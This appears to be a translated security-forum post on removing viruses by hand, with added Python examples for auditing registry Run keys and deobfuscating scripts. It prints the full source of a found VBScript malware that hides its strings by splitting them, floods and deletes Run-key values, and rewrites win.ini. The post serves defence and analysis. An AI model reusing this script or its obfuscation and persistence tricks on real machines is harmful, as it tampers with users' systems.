Forum: Virus Zone    Title: Manual virus removal, my personal advice.
Author: moley [moley]    Forum user
1) Any time you notice the system throwing unexpected errors, I suggest scanning the processes with a tool! Heh, I use the process manager in 优化大师 (Windows Optimizer); it's not that I'm biased.

2) If you find a suspicious process, I suggest searching the web for that file straight away. If it is a virus that has already been seen, congratulations. If not, you should watch what is different on your beloved machine after that process is closed. If nothing changes, we can try deleting it, and check whether the registry has a startup entry naming that file; if it does, delete it! Remember, I don't recommend permanently deleting that file from the Recycle Bin. Once everything is done, reboot, and see whether the machine still misbehaves.

3) Check the registry; when you find a suspicious entry, follow its string value to the corresponding directory and delete the file. Of course, if a search cannot find the file, go to DOS and type dir /s <filename>, then
attrib <filename> -h -s -r
That changes the file's attributes so it can be deleted.
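Steps 1 to 3 boil down to: find the startup entry, resolve the file it launches, and work out what that file is. The following Python script is an added example written for this page, not code from the original post: it parses a text export of the Run keys (the format Regedit's File > Export writes) and flags entries with the traits of the case described later in this post: a silent regedit -s import at logon, a payload with a non-executable extension, a $...$ directory sitting directly under the drive root, or value data that is not a command at all. The export text below is constructed for the example; only the WlN32 entry mirrors what the post quotes, the other entries are invented benign-looking ones.

```python
import re
from pathlib import PureWindowsPath

# Constructed .reg export for the example (Regedit "Export" format). Only the
# WlN32 value mirrors the Run entry quoted in the post; the rest are invented
# benign-looking entries to show what does NOT get flagged.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WlN32"="regedit -s C:\\$NtUninstallQ887678$\\WINSYS.cer"
"internat.exe"="internat.exe"
"SoundMan"="SOUNDMAN.EXE"
"ExampleUpdater"="\"C:\\Program Files\\Example\\updater.exe\" /background"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"my"="12"
'''

KEY_RE = re.compile(r'^\[(.+)\]$')
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
EXEC_EXT = {".exe", ".com", ".scr"}
SCRIPT_EXT = {".bat", ".cmd", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta"}


def unescape(s):
    """Undo .reg escaping (doubled backslashes, backslash-escaped quotes)."""
    return re.sub(r'\\(.)', lambda m: m.group(1), s)


def parse_run_entries(text):
    """Return (key, value_name, data) for every value under a Run or RunOnce key."""
    entries, key = [], None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if m and key and key.rsplit("\\", 1)[-1].lower() in ("run", "runonce"):
            entries.append((key, unescape(m.group(1)), unescape(m.group(2))))
    return entries


def split_command(data):
    """Split value data into (program, arguments); honours a quoted program path."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        if end > 0:
            return data[1:end], data[end + 1:].strip()
    parts = data.split(None, 1)
    return (parts[0] if parts else ""), (parts[1] if len(parts) > 1 else "")


def review_entry(data):
    """Return the reasons a Run value looks suspicious (empty list = nothing found)."""
    reasons = []
    program, args = split_command(data)
    if not re.search(r'[A-Za-z]', program):
        return ['data is not a command at all (the script in the post writes junk such as "12")']
    prog_name = PureWindowsPath(program).name.lower()
    if prog_name in ("regedit", "regedit.exe") and re.search(r'(^|\s)[-/]s(\s|$)', args, re.I):
        reasons.append("silent regedit import (-s) runs at every logon")
    # The program itself plus any drive-letter path mentioned in the arguments.
    refs = [program] + re.findall(r'[A-Za-z]:\\[^\s"]+', args)
    for ref in refs:
        p = PureWindowsPath(ref)
        if p.suffix and p.suffix.lower() not in EXEC_EXT | SCRIPT_EXT:
            reasons.append(f"payload {p.name} has a non-executable extension {p.suffix}")
        parts = p.parts
        # Hotfix-uninstall folders ($NtUninstall...$) normally live under the
        # Windows directory, not directly under the drive root.
        if len(parts) > 1 and p.drive and parts[1].startswith("$") and parts[1].endswith("$"):
            reasons.append(f"{parts[1]} is a $...$ directory directly under the drive root")
    return reasons


def audit_run_keys(text):
    """Return [(key, name, data, reasons)] for entries that raised at least one reason."""
    flagged = []
    for key, name, data in parse_run_entries(text):
        reasons = review_entry(data)
        if reasons:
            flagged.append((key, name, data, reasons))
    return flagged


if __name__ == "__main__":
    for key, name, data, reasons in audit_run_keys(SAMPLE_REG):
        print(f"{key}\n  {name} = {data}")
        for r in reasons:
            print(f"    - {r}")
```

The heuristics are deliberately narrow: an entry is only reported when it shows one of the traits the post itself describes, so a legitimate entry such as a quoted program path with arguments passes untouched. Anything it flags still needs the manual follow-up from step 3 (locate the file, clear its attributes, inspect it) before deleting.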


4) I remember helping a friend hunt down a virus like this a few days ago. The annoying part was that the virus's registry entry on Win2K was: regedit -s C:\$NtUninstallQ887678$\WINSYS.cer, yet searching simply could not find the file "WINSYS.cer". Infuriating! In the end I went back to plain old DOS and typed:
D:\winnt>cd..
D:\>dir /s $NtUninstallQ887678$    There you are, buddy!
D:\>attrib $NtUninstallQ887678$ -h -s -r
D:\>cd $NtUnins~    Heh, buddy, hiding pretty tight. Damn, who writes viruses like this?
D:\$NtUninstallQ887678$>dir    Oh my God, it's a script virus file, WINSYS.vbs. Ugh, disgusting!!! Quick, this is somebody's virus, let's analyze it!
D:\$NtUninstallQ887678$>copy WINSYS.vbs D:\info.txt
Heh, now delete it.
D:\$NtUninstallQ887678$>del *.*
"Enter Y"
Deleted, no questions asked!
OK, code like this is worth sharing!
CODE WINSYS.vbs for VBScript
Set sss = CreateObject("WSc" + "ript.Sh" + "ell")
mhk="HK"&"LM\SO"&"FTWARE\Mi"&"cr"&"os"&"oft\Win"&"dows\Cu"&"rren"&"tVersion\Run\"
mhc="H"&"K"&"CU\So"&"ft"&"ware\Mic"&"ros"&"oft\Win"&"dows\Curren"&"tVersion\Run\"
mhk2="HK"&"LM\SO"&"FT"&"WARE\M"&"icr"&"osoft\Wi"&"n"&"dows\Curren"&"tVersion\"
sss.RegWrite ""&mhk&"WlN32","regedit -s C:\$NtUninstallQ887678$\WINSYS.cer"
' Damn, this part writes the registry like crazy; it really seems far too verbose and over the top!
sss.RegWrite ""&mhk&"internat.exe","internat.exe"
sss.RegWrite ""&mhk&"zwupdows","12"
sss.RegWrite ""&mhk&"win","12"
sss.RegWrite ""&mhk&"mwin","12"
sss.RegWrite ""&mhk&"internt","12"
sss.RegWrite ""&mhk&"Inernet","12"
sss.RegWrite ""&mhk&"Internet","12"
sss.RegWrite ""&mhk&"iexpleror","12"
sss.RegWrite ""&mhk&"zxdows","12"
sss.RegWrite ""&mhk&"qwe","12"
sss.RegWrite ""&mhk&"win1","12"
sss.RegWrite ""&mhk&"intelnat.exe","12"
sss.RegWrite ""&mhk&"u1888","12"
sss.RegWrite ""&mhk&"intenet","12"
sss.RegWrite ""&mhk&"9i5zxdows","12"
sss.RegWrite ""&mhk&"9i5com01zxdows","12"
sss.RegWrite ""&mhk&"99zxdows","12"
sss.RegWrite ""&mhk&"88zxdows","12"
sss.RegWrite ""&mhk&"Start Pagewin","12"
sss.RegWrite ""&mhk&"Start Page","12"
sss.RegWrite ""&mhk&"u188","12"
sss.RegWrite ""&mhk&"9i5comzxdows","12"
sss.RegWrite ""&mhk&"9q5zxdows","12"
sss.RegWrite ""&mhk&"u1881","12"
sss.RegWrite ""&mhk&"u1882","12"
sss.RegWrite ""&mhk&"u1883","12"
sss.RegWrite ""&mhk&"u1884","12"
sss.RegWrite ""&mhk&"u1885","12"
sss.RegWrite ""&mhk&"u1886","12"
sss.RegWrite ""&mhk&"u1887","12"
sss.RegWrite ""&mhk&"u88y", "12"
sss.RegWrite ""&mhk&"flash", "12"
sss.RegWrite ""&mhk&"999izxdows","12"
sss.RegWrite ""&mhk&"033zxdows","12"
sss.RegWrite ""&mhk&"syste","12"
sss.RegWrite ""&mhc&"my","12"
sss.RegWrite ""&mhk&"3zxdows","12"
sss.RegWrite ""&mhk&"88u88","12"
sss.RegWrite ""&mhk&"system","12"
sss.RegWrite ""&mhk&"8zxdows","12"
sss.RegWrite ""&mhk&"u18","12"
sss.RegWrite ""&mhk&"interneet.exe","12"
sss.RegWrite ""&mhk2&"RunOnce\", "12"
sss.RegWrite ""&mhk&"iexpler", "12"
sss.RegWrite ""&mhk&"u1810", "12"
sss.RegWrite ""&mhk&"winwin", "12"
sss.RegWrite ""&mhk&"WIN32", "12"
sss.RegWrite ""&mhk&"W1N32", "12"
' Delete the redundant values it just created!
sss.RegDelete ""&mhc&""
sss.RegDelete ""&mhk&"zwupdows"
sss.RegDelete ""&mhk&"win"
sss.RegDelete ""&mhk&"mwin"
sss.RegDelete ""&mhk&"internt"
sss.RegDelete ""&mhk&"inernet"
sss.RegDelete ""&mhk&"Internet"
sss.RegDelete ""&mhk&"u188"
sss.RegDelete ""&mhk&"iexpleror"
sss.RegDelete ""&mhk&"zxdows"
sss.RegDelete ""&mhk&"qwe"
sss.RegDelete ""&mhk&"win1"
sss.RegDelete ""&mhk&"intelnat.exe"
sss.RegDelete ""&mhk&"intenet"
sss.RegDelete ""&mhk&"9i5zxdows"
sss.RegDelete ""&mhk&"9i5com01zxdows"
sss.RegDelete ""&mhk&"99zxdows"
sss.RegDelete ""&mhk&"88zxdows"
sss.RegDelete ""&mhk&"Start Pagewin"
sss.RegDelete ""&mhk&"Start Page"
sss.RegDelete ""&mhk&"9i5comzxdows"
sss.RegDelete ""&mhk&"9q5zxdows"
sss.RegDelete ""&mhk&"999izxdows"
sss.RegDelete ""&mhk&"033zxdows"
sss.RegDelete ""&mhk&"u1881"
sss.RegDelete ""&mhk&"u1882"
sss.RegDelete ""&mhk&"u1883"
sss.RegDelete ""&mhk&"u1884"
sss.RegDelete ""&mhk&"u1885"
sss.RegDelete ""&mhk&"u1886"
sss.RegDelete ""&mhk&"u1887"
sss.RegDelete ""&mhk&"u88y"
sss.RegDelete ""&mhk&"flash"
sss.RegDelete ""&mhk&"88u88"
sss.RegDelete ""&mhk&"interneet.exe"
sss.RegDelete ""&mhk&"u18"
sss.RegDelete ""&mhk&"u1888"
sss.RegDelete ""&mhk&"system"
sss.RegDelete ""&mhk&"3zxdows"
sss.RegDelete ""&mhk&"8zxdows"
sss.RegDelete ""&mhk&"syste"
sss.RegDelete ""&mhk2&"RunOnce\"
sss.RegDelete ""&mhk&"iexpler"
sss.RegDelete ""&mhk&"u1810"
sss.RegDelete ""&mhk&"winwin"
sss.RegDelete ""&mhk&"WIN32"
sss.RegDelete ""&mhk&"W1N32"
' Damn it, not content with writing the registry, it also wants to look at Windows 9x's win.ini and system.ini. I don't want to read much more or see what it's after; anyway it's pretty low-grade. Luckily this person doesn't know win2k very well, boohoo!
Set FSO = CreateObject("Scrip" + "ting." + "FileSyst" + "emO" + "bject")
myfile14=FSO.FileExists("c:\wind" + "ows\W" + "IN.INI")
if myfile14 then
set FSO2=FSO.OpenTextFile("c:\win" + "dows\W" + "IN.INI")
mywin=FSO2.ReadALL()
l=Instr(mywin,"run=")-3
m=Instr(mywin,"load=")-1
n=Instr(mywin,"NullPort=")-3
FSO2.close
if l>0 and m>0 and l>m then
set FSO3=FSO.OpenTextFile("c:\wi" + "ndows\W" + "IN.INI")
mywin2=FSO3.Read(l)
FSO3.close
set FSO4=FSO.OpenTextFile("c:\win" + "dows\WI" + "N.INI")
mywin3=FSO4.Read(m)
FSO4.close
if n>0 and n>l then
set FSO5=FSO.OpenTextFile("c:\wind" + "ows\WIN" + ".INI")
mywin4=FSO5.Read(n)
FSO5.close
mywin=Replace(mywin,mywin4,"")
set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI")
FSO2.Write mywin3
FSO2.WriteLine "load="
FSO2.Write "run="
FSO2.Write mywin
FSO2.close
else
mywin=Replace(mywin,mywin2,"")
set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI")
FSO2.Write mywin3
FSO2.Write "load="
FSO2.Write mywin
FSO2.close
end if
end if
end if

Of course, the program does have one thing worth admiring: because it uses the "+" operator, the program is very easy to modify!
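The "+" and "&" splitting the author points out is what kept "WINSYS.cer", "WScript.Shell" and the Run key paths from showing up in a plain text search of the script. As an added example (my code, not from the original post or the virus's author), here is a small Python deobfuscator that collapses those literal concatenations, substitutes the mhk/mhc style constants, and lists the RegWrite/RegDelete operations with the registry paths fully spelled out. The input is a constructed excerpt that copies a handful of lines from the listing above, not the whole script.

```python
import re

# Constructed excerpt in the style of the WINSYS.vbs listing above (a handful of
# its lines, not the whole script), used as input for the example.
SAMPLE_VBS = r'''
Set sss = CreateObject("WSc" + "ript.Sh" + "ell")
mhk="HK"&"LM\SO"&"FTWARE\Mi"&"cr"&"os"&"oft\Win"&"dows\Cu"&"rren"&"tVersion\Run\"
mhc="H"&"K"&"CU\So"&"ft"&"ware\Mic"&"ros"&"oft\Win"&"dows\Curren"&"tVersion\Run\"
sss.RegWrite ""&mhk&"WlN32","regedit -s C:\$NtUninstallQ887678$\WINSYS.cer"
sss.RegWrite ""&mhc&"my","12"
sss.RegDelete ""&mhc&""
Set FSO = CreateObject("Scrip" + "ting." + "FileSyst" + "emO" + "bject")
'''

STR = r'"[^"\n]*"'                      # a VBScript string literal without embedded quotes
CONCAT = re.compile(rf'({STR})\s*[+&]\s*({STR})')
ASSIGN = re.compile(rf'^(\w+)\s*=\s*({STR})$')
CALL = re.compile(r'^(\w+)\.(RegWrite|RegDelete)\s+(.*)$')
TWO_ARGS = re.compile(rf'^({STR})\s*,\s*({STR})$')
ONE_ARG = re.compile(rf'^({STR})$')


def merge_literals(line):
    """Collapse "a" + "b" and "a" & "b" into "ab", repeating until nothing changes."""
    while True:
        merged = CONCAT.sub(lambda m: '"' + m.group(1)[1:-1] + m.group(2)[1:-1] + '"', line)
        if merged == line:
            return merged
        line = merged


def deobfuscate(script):
    """Rebuild the strings the script actually uses.

    Returns {"constants": {name: value}, "registry_ops": [...], "other": [lines]}
    where registry_ops holds ("RegWrite", path, data) and ("RegDelete", path) tuples.
    """
    constants, ops, other = {}, [], []
    for raw in script.splitlines():
        line = merge_literals(raw.strip())
        if not line:
            continue
        m = ASSIGN.match(line)
        if m:                                  # e.g. mhk = "HKLM\...\Run\"
            constants[m.group(1)] = m.group(2)[1:-1]
            continue
        # Substitute known constants into expressions and merge again so that
        # ""&mhk&"WlN32" becomes a single literal.
        for name, value in constants.items():
            line = re.sub(rf'\b{re.escape(name)}\b', lambda _m, v=value: '"' + v + '"', line)
        line = merge_literals(line)
        m = CALL.match(line)
        if m:
            method, arglist = m.group(2), m.group(3).strip()
            if method == "RegWrite" and (a := TWO_ARGS.match(arglist)):
                ops.append(("RegWrite", a.group(1)[1:-1], a.group(2)[1:-1]))
                continue
            if method == "RegDelete" and (a := ONE_ARG.match(arglist)):
                ops.append(("RegDelete", a.group(1)[1:-1]))
                continue
        other.append(line)
    return {"constants": constants, "registry_ops": ops, "other": other}


def autostart_writes(result):
    """Only the RegWrite operations that land under a Run or RunOnce key."""
    return [op for op in result["registry_ops"]
            if op[0] == "RegWrite" and re.search(r'\\CurrentVersion\\Run(Once)?\\', op[1], re.I)]


if __name__ == "__main__":
    result = deobfuscate(SAMPLE_VBS)
    for name, value in result["constants"].items():
        print(f"{name} = {value}")
    for op in result["registry_ops"]:
        print(" ".join(op))
    print("autostart writes:", len(autostart_writes(result)))
```

With the literals merged, the resolved paths make the script's intent readable at a glance: the WlN32 value under HKLM\...\Run is the regedit -s line the post found in the registry, and the RegDelete on a path ending in a backslash targets a key rather than a value, so that line removes the whole HKCU Run key. The same pass turns the split CreateObject strings back into "WScript.Shell" and "Scripting.FileSystemObject", which is what a signature or a text search would have needed to see.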

5) OK, I'm pretty much a newbie myself, so I won't say more; experts, please don't take offence. If you like, let's be friends. My QQ: 75314404, from Fujian.


[This post was edited by 无泪剑客 (moley) on October 20 at 20:52]

Original poster    Posted: 10/20 20:02


Copyright © 2000-2010 20CN Security Group. All Rights Reserved.